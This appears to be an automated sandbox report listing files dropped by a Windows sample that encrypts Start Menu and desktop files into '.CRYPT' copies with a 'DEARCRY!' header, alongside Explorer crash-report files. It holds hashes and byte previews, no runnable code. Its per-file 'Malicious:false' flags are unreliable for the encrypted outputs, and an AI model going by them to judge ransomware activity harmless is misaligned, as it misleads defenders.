                                                            Preview: DEARCRY!........(..p...[<d.!W....#.=W#.L?.'.1\aU..]...#}>. a.-.....a.....l9....d4i..tA.6..E..B......G...w...;XI..^._5....@...S"[u....h {z.....)........O..S)...().....5.4U..E!L....{..=(|_.a..32.t....../p=.B.C.`.C+...h.0.D.....@.v`..+....f%^jg......K%.................._......._.?..Y7.z.Z.9.`..^:\.rM.'<)N-..XtR......!m..o;tn!..$Y.`-.....[U.=,.:../C%._.....<.1.D..\..a@...}.......!.g...M..F.......[.L..../".../.v.....y`c....<...O<.M
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):494
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:5D5C142D5E2C3C0F8FB91462CF9D6E7E
                                                            SHA1:69887F19D96CEEEBC4F58D3A49C5D79AEA308A03
                                                            SHA-256:70732E7FEE8B6191AE91AF27C6CBFD276D41E62BD423FE634A28EE28C4A934C2
                                                            SHA-512:24DC2E7AE4A7A84BC8E6EEFC80860FB44484C569391CB848FD12EBE9C5BC0E87C11CCA48929FE866F634D8129CA69037F894E20F43ED3BA9157151396750D92B
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):776
                                                            Entropy (8bit):7.724493915432036
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:2488AE5244F98E9E07A4A3BEB801F4B7
                                                            SHA1:E0EE16DEDF3468E8E8C879302BC3DFFA9639D399
                                                            SHA-256:1E7AEB1A9D2D021376CF0602E11C3E1039DA37CAE570DCC6E4FA0AC6188F1C30
                                                            SHA-512:4340EDDFFF56ABEE0056CF408182CC4A8F7B73DA507798A52B37C89872E15EB620CD889F1671B369D9B5AC87114F7426EE7F617EC942DAFD8FCB9B78984D9AFF
                                                            Malicious:false
                                                            Preview: DEARCRY!.....y..yS}..P...f.p..!}.s.^l..+$0T...|;]ge.a;..*^.hw..P<.L54.H..F.2,.g?!.9..z>...}..T.+0..+.......l.....oFjS`.95[........n.3{.v....;..^........H.K#l.*3..A.....+.|^}...z/..P.+.91&..B.`6._..AZz.....$...../Q.y....2C..A4{.y.p!;...A..O..uE........UB.f..J,.............m...].MI%i.U..d.g#m]..........u.+..Z..Uy.6..|.v.A...%.v.P., .....'{.S.A..7#...1..,....D.ez...3.{.n.P.qrB.........IK.#......n...s.01..i.. .r.2Y..*...,'m...[.;....yk.#Sp..T..T.q......a.eOP....L.^..}k.M.:.Ys..7.v.-O..c..K*.....r>..SRYy`.....`. !..I.....|/1?.....^.U..J......?}.z.-.5..QT..`.qe..z.#.F.2.-../.....=....4..8..d..H..8.....e..O.....I4..J......Y....`....K.x..&..9.B.G.1p...U.b.....&..8.....L..^.)2.$(.VF.............qpl.7... "N...-.....d.%.WS.......v...K.S......t4.c.:
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):174
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:ACE3165E852ADB8AEDBEDA2AA3BE570B
                                                            SHA1:4577FF7E92850E2723008F6C269129BD06D017EA
                                                            SHA-256:237F73D46D3501DE63EAE1F85FDF37E65DDCED70F013B7F178D1EE52B08F051F
                                                            SHA-512:CF77563B9295B191CE2F309E03618D1AB4D317F65B87DBECC4904EE2D058DB06D23C20C199571B0FAFB67AE5EC5166B76AF0B7D8BFE3996B0DDE9751E28F8C03
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):456
                                                            Entropy (8bit):7.537633464098582
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:7148E7F6CC2B8DEC2156C8F86AEBFC4A
                                                            SHA1:7C032574A11EDE9B8DB77589785546329FDCB5FA
                                                            SHA-256:3EEF61EE19708099140A080EE9BF497C5967A579060E5D0E79A53C791FCD54DF
                                                            SHA-512:96409AA219B28DB085190E04CB6F1DD3E9EA32B647296306566DB668E7B5ADF810DD7BC12608E1818FFBD1A55BA0A3BCFFA952E2A99E1A4EC7021C4B9B0F1AC7
                                                            Malicious:false
                                                            Preview: DEARCRY!....=.[......|.r`....miNLh.{_.#.rJ..I....T..:...[.P#o.1..[.$0..y4.H..Gp.^s.W.....U....I1..g.;}.+.d^..I......'p.\.m7....:...,...D.....T.....?...J.".m.1..&....<U.K.M....>..\..Fg.h.......C.........c..5G0...{..)..]~s.:..i....]f4r...E...Z-......7Q....e...............b..IOA.....e.x>....S....O.....e."-..~q0.K.......N..y...l./...<...G...O."....5.p...VG........4..a.pF#...J+.......&.'z...\.T*.......X.2.....9.[.8....Af.V..XB..1X"...Z.
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):338
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E54914068570928FEBE65C8DC7FDE287
                                                            SHA1:46D0A3754B75FAFAD74CFA0912CCF2D9457C14B4
                                                            SHA-256:A4C65A576C9848BD6438BA704E90BE3D2EA275F83DE420608343F6A27691640D
                                                            SHA-512:0A34DB8E8A6FF3E67E1AF3E63F062A2E7B8F43F8D74A620F130ED25BDA34A3300003EA95C3A1ED86D4348A34E450548075FB3D914B87BEB25CAF4B430F84DB00
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):632
                                                            Entropy (8bit):7.690030369543612
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:C62D6BE47EBFA73FCF5868AE902BB599
                                                            SHA1:D1D3FA58AE63B085B940D413FCA02D33D06857CA
                                                            SHA-256:8A0D37DBF661DCA3CD8CBE08E9A11FB17EF1CA52AD698005267909CEB4D14D65
                                                            SHA-512:CD444D42EBFF919B28D37B7AF641E2C0F6A00A1D36F41383C79CF553C4277B14DF0C3D02666E295F040F307E7CE27C6586E579C09DDB58CA64FA533EE3AE08D9
                                                            Malicious:false
                                                            Preview: DEARCRY!.............&........w.{.S....3.y...f8..J.)R\.O6$..*Bc.. .'......|1...7Dx.~......6/....C.g.J).Os.&.../.S@...D.........[.e....n.WRa...U.z/*+...-..V.a.W.`..K>.........0.Q.p,.Vk..mpN|..]...6..iAg<....t..... .PD'.....M.e..uQ...l.{..4i....-.G.?....R........n^w..o=s......I*..0{.....J...!..........Fdx..iH....f.h..5.(Io..O..J.a...:!.U..{+....F./.:in.g..p..9..+}.$....fW.7GO......dm.A..EA.&...r.}...G'.8.X....&..r......I._Q.XStL......z.=...R....Z.U..=.......T..%..6..%."F.zb<e.:..w..+....C.}..%..=..J.....0.L.y....& ..[@./:@.!....n...Oz5.....a...y.\...I........g.r.[JF}..7zK&.F5./.....".....
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):8880
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:7E9263E27191BF5B5985BE3D7C3EE487
                                                            SHA1:73ECAF33376142BDB52380A1EEAFAC24DFA9C190
                                                            SHA-256:AE8DDDF127F229A4BA99822B72C35AB9657618FF63FDB7A0A187EF66D79A5B95
                                                            SHA-512:CE7BAB45DB718DE99E9A2C08F72C86B8DC1AB1D3E3E7ECDD2663C452F17B5D070D78D9DAFB746A8C3F970DCD22986AEAEBB74C87F3D1F9FFA39CB8E6E7E8E4DE
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):12384
                                                            Entropy (8bit):7.965750900984845
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:7D46C7C97A6594F5D0DAEA2A68F16B09
                                                            SHA1:5994FA5D832E081579C2FEB5E0EAE171EEA96D17
                                                            SHA-256:E3F9F69B4AA3EC6D3D351EF50B0D9A28967E1BE89F7334C647A0C720FA1DBD9B
                                                            SHA-512:0C45EAA7A9D78AA785A4549B7EAD9F4113D1C1DC825A4AA5528B8FD2B934B4537784A3E488B081514C521B37BECA36D82C00817A5DB2BB6AD162C9133A6E6532
                                                            Malicious:false
                                                            Preview: DEARCRY!......@s8e.tul....10.v..s..."......T....Je._.(.{.....#..5.f.....K............o.+.....H6>...9 .De}..z..]....i..(.........'.Fg8.........E7..:.w..-.?n..T.8.-y...~..K.Ggj.<~(.(!.......s....7..;..'...LFv.c4..<.....z]K...\P..v...!..FMd..{....^..p. LH..............|GQ)........jY....j..P.!.@...... o..`",...9&L...xQd..E.;Y.G....m.it......{46.C...o3k.\.@~d0... ............J..K......7.....w.S1.E..W.P...l.......I"B.h.V.7........|.O..-J:.\.-....^.BQ.Rw.tn...F(..{..=..;yL...5 z...:..w.&..b.{_.%.\.:B..w.......lB.....w....c..^p.+.{..vq.%.\i....F.....%9t......(._.u*.&.]~...XS...T)r<\.........c..C..<.E...m....6.....b[[...W...GK..4N...v....xd......GG........W..;.m~.d....y..!...2....qU.*..i..p}'>...a_B...%e%.......5.d...zMpC.Y..Tk...7.U.t.G&.G.'.B.......QU..Y..?...l^I........_L..)...pJ...)ce...:J.v.._.....@....W..Wxv.RO.(.V.gu#.y.w?J...TD. ...|.m..m...B..t.[.q...)..u|..s.7.|N..v.\...ZY,..[....N~l.?.b...qD0.j.UP.1a....o...U...AF9.d..............b
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):174
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:ACE3165E852ADB8AEDBEDA2AA3BE570B
                                                            SHA1:4577FF7E92850E2723008F6C269129BD06D017EA
                                                            SHA-256:237F73D46D3501DE63EAE1F85FDF37E65DDCED70F013B7F178D1EE52B08F051F
                                                            SHA-512:CF77563B9295B191CE2F309E03618D1AB4D317F65B87DBECC4904EE2D058DB06D23C20C199571B0FAFB67AE5EC5166B76AF0B7D8BFE3996B0DDE9751E28F8C03
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):456
                                                            Entropy (8bit):7.440916065113356
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:881F65127B7C37D80F8806B88D0D61DE
                                                            SHA1:93AAEEC52A6332203AE6F88C4BF80CA0665A2422
                                                            SHA-256:7B6E49290863D37002A614EB477CCEB37EBD93948EB278A2B636F322D71AB25E
                                                            SHA-512:D1EA1275515B80CE8C792C9B086E974EC3A188BCC0ADBF6503FE79F32DCC08F38049E2136C7295924962BDE2BE1DAA07085D5FDC7EFC902D24BC0A7E0D9AA3AE
                                                            Malicious:false
                                                            Preview: DEARCRY!....O.%...f.....jw.[.Q...w.vHD...b......2.....@..%...A[d.....4\.kF:.g.3j.l.%.'V.f...v"-4.)2...8.;..,.....]Ur.....\....v.~.a.....z....W_+...D.~.g..>..}4........(..<'A3.....f.)T.y.........X....q.fE.<..v.$....+..]..$h3.o....G!{..keJ3.`.'....&.!.).................-<.J.7u.Q.W...I.. ...>..a...J..Sv.5..C.Y.^.....8V0|I..J..?^...)..x>....a.3.aIa.......,..9r..g. .2/......&0.Q..NMV..H.&.....4q....qf.ojK......ja..../"@.nc.\b\..+?...l
                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_de01dd31a8cef2e8c7bdabd18058c0327f9cf_10665708_1b2206c2\Report.wer
                                                            Process:C:\Windows\System32\WerFault.exe
                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):32486
                                                            Entropy (8bit):3.6821013589828393
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:035352B995E5D504FA045B65CFFD0722
                                                            SHA1:BC137AA9E2782EF86E669678DD33D7E7B9A71468
                                                            SHA-256:63AA82FF9A94A4690C76804F01B998BBEB93B04D3A57B3901E610F5F056FCAD2
                                                            SHA-512:C09B7CB4C6351EDBBCEB9F71032C282F758FD01A425F63AE201E5A9BC22DA65C02ADBA7BB2E2BDB2DAD92669DE49AEDB48AC63DEED27BF93DF69388C2D7BF6A1
                                                            Malicious:false
                                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.0.0.0.9.4.3.3.8.7.7.6.4.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.d.f.4.0.8.1.-.9.3.4.b.-.4.d.7.e.-.9.2.7.a.-.6.2.9.e.b.d.7.a.4.9.0.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.7.a.6.5.8.3.b.-.7.3.1.0.-.4.4.0.d.-.a.7.c.9.-.6.c.3.9.2.a.e.9.c.e.a.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.E.x.p.l.o.r.e.r...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.3.c.-.0.0.0.1.-.0.0.1.7.-.b.8.2.d.-.9.f.a.4.0.a.1.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.5.d.0.2.9.9.1.4.0.c.f.9.8.8.7.5.b.0.7.d.b.d.2.d.8.9.2.6.1.7.4.0.1.d.a.d.8.b.9.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.5././.0.4././.1.2.:.0.2.:.2.
                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER5F7.tmp.WERInternalMetadata.xml
                                                            Process:C:\Windows\System32\WerFault.exe
                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):10394
                                                            Entropy (8bit):3.7093451032208797
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:7AC719B849C97BED5C7B860223445934
                                                            SHA1:1CBD2F769E65556CBBFAEFDCAA55D117B904E1D6
                                                            SHA-256:1BECC3478AFCBFE807E64654E59FDB0A664176E15F1CA4775A0C499792C1EE75
                                                            SHA-512:CED10D012884D9D4943940288048CAC5C3AF3E6967F45A1E0554C4A09509D31A189B327BED86A0B52B39377DAD9667D251B2B7CD84F0094661596E186EB3D63F
                                                            Malicious:false
                                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.3.8.8.<./.P.i.d.>.......
                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER695.tmp.xml
                                                            Process:C:\Windows\System32\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4697
                                                            Entropy (8bit):4.4744095669796105
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:1E3A6B2366DC7068D00CCFFBE0676D57
                                                            SHA1:26C5216696FA04FA6B4E2165C068D6A6550A1E0B
                                                            SHA-256:1E6A6CC3F65CF80E24BCEF126B6F790A9FE85EEF8D6E203516335A1462833D32
                                                            SHA-512:EE0AEA2AAAD992E6AD1437DBF2859AC5B3EB5A3CEA04C0EBF2C10929106D2D3C6F29B5152E1CC3A8594AFBBCB253726EA4EC4286BD167A33EDD27397F34F085E
                                                            Malicious:false
                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="898147" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERF491.tmp.dmp
                                                            Process:C:\Windows\System32\WerFault.exe
                                                            File Type:Mini DuMP crash report, 16 streams, Fri Mar 12 07:57:17 2021, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):1090056
                                                            Entropy (8bit):1.4077656210049645
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:2BAC0ECA19230C5B3A1FA899C44AB62A
                                                            SHA1:D7DD070C3F4B8C5554B99200C18C9F6AC089CBA1
                                                            SHA-256:2688327BC66A39FCC0B044E7F5CB9F03C6031337C52C8F6F4FD5A9AAB3A9C916
                                                            SHA-512:F382AA410C95359E9F0BD540E55577359777C1446B2D79CF1F0E2ED7CC8B0C1F6C0C6A5F612D1734CA6651FC51C9F18EC80A06E69998C0850503A7FD031F7E91
                                                            Malicious:false
                                                            Preview: MDMP....... .........K`...................U...........B.......z......Lw.................'....T.......<.....K`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...a.m.d.6.4.,.1.0...0...1.7.1.3.4...1.......................................................................................................
                                                            C:\Users\Public\Desktop\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):1392
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:7D5EAF35D93FD6DCC9FD8837AED16ACD
                                                            SHA1:59E4FFDDA4239656019B69D3CC4328D60C0396A8
                                                            SHA-256:B077C256877A46386EA2FDB56E69A74C01FBD17C26DCCD454E63DF0B9147276C
                                                            SHA-512:281CB1265C87BE8AD7BF4AAE35D2252A9051C5823AF0BC8243777236953CE59A328875D9B90DFF4DAE80EB861FED8C4C95C8B62C7103448D4032F4028C784A94
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\Users\Public\Desktop\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):3648
                                                            Entropy (8bit):7.881423776988441
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:851FA52382CCD9154739B31B077D3244
                                                            SHA1:5866FF3A9DF9ABBF46A316F0C3E59C0271CCDCA2
                                                            SHA-256:D1C9C6AB2C006C94F3696C76A237C81474CC32DCF9585DD5A41E180ABE3DB481
                                                            SHA-512:4F1BCE895B7A9F009145475ECF22A6726887F17C6309DA8E27F9829F0BE932D296425243BD6B7F1EE96A4FA2266A747842A691B294627EB2E49DD78B54CE0EEC
                                                            Malicious:false
